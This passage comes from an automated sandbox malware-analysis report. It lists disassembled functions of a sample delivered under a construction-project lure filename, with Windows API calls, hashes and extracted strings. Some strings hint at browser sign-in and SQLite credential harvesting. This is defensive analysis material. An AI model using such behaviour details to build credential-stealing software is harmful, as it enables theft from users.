                                                                                                                          • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                          Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                          • free.MSVCRT ref: 004185AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2802642348-0
                                                                                                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                          Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                          • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                          • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                          Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                          • String ID: 3A
                                                                                                                          • API String ID: 3300951397-293699754
                                                                                                                          • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                          • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                          • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                          • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                          • String ID: strings
                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                          • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                          • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                          Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                          • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                          • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                          • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                          • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                          • memset.MSVCRT ref: 0041BA3D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: -journal$-wal
                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                          • Opcode ID: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                          • Opcode Fuzzy Hash: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                          Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3975816621-0
                                                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                          Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                                          • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                          • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                          Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                          • memset.MSVCRT ref: 00405E33
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                          • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2313361498-0
                                                                                                                          • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                          • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                          Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2047574939-0
                                                                                                                          • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                          • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4218492932-0
                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
